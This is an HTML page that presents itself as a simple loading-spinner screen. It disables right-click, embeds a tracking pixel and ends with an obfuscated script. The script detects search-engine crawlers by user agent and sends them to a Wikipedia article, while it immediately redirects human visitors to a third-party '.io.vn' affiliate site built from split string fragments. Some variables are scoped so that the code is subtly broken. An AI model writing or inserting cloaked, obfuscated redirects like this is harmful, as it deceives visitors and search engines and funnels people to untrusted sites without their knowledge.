<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="shortcut icon" href="favicon.ico" type="image/x-icon">
<link href="https://stackpath.bootstrapcdn.com/bootstrap/5.0.0-alpha1/css/bootstrap.min.css" rel="stylesheet">
<style> 
			body {
				margin: 0;
				background-color: #f9f9fa;
				height: 100vh;
				display: flex;
				justify-content: center;
				align-items: center;
			}

			.flex-container {
				display: flex;
				justify-content: center;
				align-items: center;
				height: 100vh;
				width: 100vw;
			}

			.jumping-dots-loader {
				width: 100px;
				height: 100px;
				position: relative;
				display: flex;
				justify-content: space-between;
			}

			.jumping-dots-loader span {
				width: 20px;
				height: 20px;
				border-radius: 50%;
				background-color: rgba(241, 83, 110, 0.8);
				animation: bounce 1s ease-in-out infinite;
			}

			.jumping-dots-loader span:nth-child(2) {
				animation-delay: 0.33s;
			}

			.jumping-dots-loader span:nth-child(3) {
				animation-delay: 0.66s;
			}

			@keyframes bounce {
				0%, 75%, 100% {
					transform: translateY(0);
				}
				25% {
					transform: translateY(-20px);
				}
			}

		</style>
<script type="text/javascript" src="https://cdn.jsdelivr.net/npm/popper.js@1.16.0/dist/umd/popper.min.js"></script>
<script type="text/javascript" src="https://stackpath.bootstrapcdn.com/bootstrap/5.0.0-alpha1/js/bootstrap.min.js"></script>
</head>
<body oncontextmenu="return false" class="snippet-body">
<div class="flex-container">
<div class="page-content page-container" id="page-content">
<div class="padding">
<div class="row container d-flex justify-content-center">
<div class="col-md-4 col-sm-6 grid-margin stretch-card">
<div class="loader-demo-box">
<div class="jumping-dots-loader"> <span></span> <span></span> <span></span> </div>
</div>
</div>
</div>
</div>
</div>
</div>
<img src="//sstatic1.histats.com/0.gif?4897382&101" alt border="0">
<script>function _0x4d42(){const _0x1eaba8=['test','6099120IYUqLd','search','74672fQtdJW','1856155TUBnAF','18359808wRqvyy','href','80ClFuXk','279427tTuYCZ','.wikipedia.org/wiki/','1360204nmCgWL','2533122NYIJEc','match','https://','e.io.','userAgent','split'];_0x4d42=function(){return _0x1eaba8;};return _0x4d42();}const _0x3c8062=_0x4aec;function _0x4aec(_0x594eb9,_0x2f42ab){const _0x4d4214=_0x4d42();return _0x4aec=function(_0x4aec32,_0x3d9a7c){_0x4aec32=_0x4aec32-0x131;let _0x124be4=_0x4d4214[_0x4aec32];return _0x124be4;},_0x4aec(_0x594eb9,_0x2f42ab);}(function(_0x5e528c,_0x39786a){const _0x100413=_0x4aec,_0x432cc1=_0x5e528c();while(!![]){try{const _0x222b93=-parseInt(_0x100413(0x132))/0x1+-parseInt(_0x100413(0x134))/0x2+parseInt(_0x100413(0x135))/0x3+parseInt(_0x100413(0x13e))/0x4*(-parseInt(_0x100413(0x131))/0x5)+-parseInt(_0x100413(0x13c))/0x6+-parseInt(_0x100413(0x13f))/0x7+parseInt(_0x100413(0x140))/0x8;if(_0x222b93===_0x39786a)break;else _0x432cc1['push'](_0x432cc1['shift']());}catch(_0xf1d9ee){_0x432cc1['push'](_0x432cc1['shift']());}}}(_0x4d42,0x92598));const searchParams=location[_0x3c8062(0x13d)],firstParam=searchParams[_0x3c8062(0x13a)]('&')[0x0],delimiterMatch=firstParam[_0x3c8062(0x136)](/[-~/=._+]/),delimiter=delimiterMatch?delimiterMatch[0x0]:null;if(delimiter){const [languageCode,URLID]=firstParam[_0x3c8062(0x13a)](delimiter);}const isBot=/bot|google|baidu|bing|msn|duckduckbot|teoma|slurp|yandex/i[_0x3c8062(0x13b)](navigator[_0x3c8062(0x139)]),defaultUrl=_0x3c8062(0x137)+languageCode+_0x3c8062(0x133)+URLID,affiliateUrl='https://mor'+_0x3c8062(0x138)+'vn'+'/'+languageCode+'/'+URLID,finalRedirectUrl=isBot?defaultUrl:affiliateUrl;isBot?setTimeout(()=>{const _0x3dd351=_0x3c8062;location[_0x3dd351(0x141)]=finalRedirectUrl;},0x7d0):location[_0x3c8062(0x141)]=finalRedirectUrl;</script>
</body>
</html>
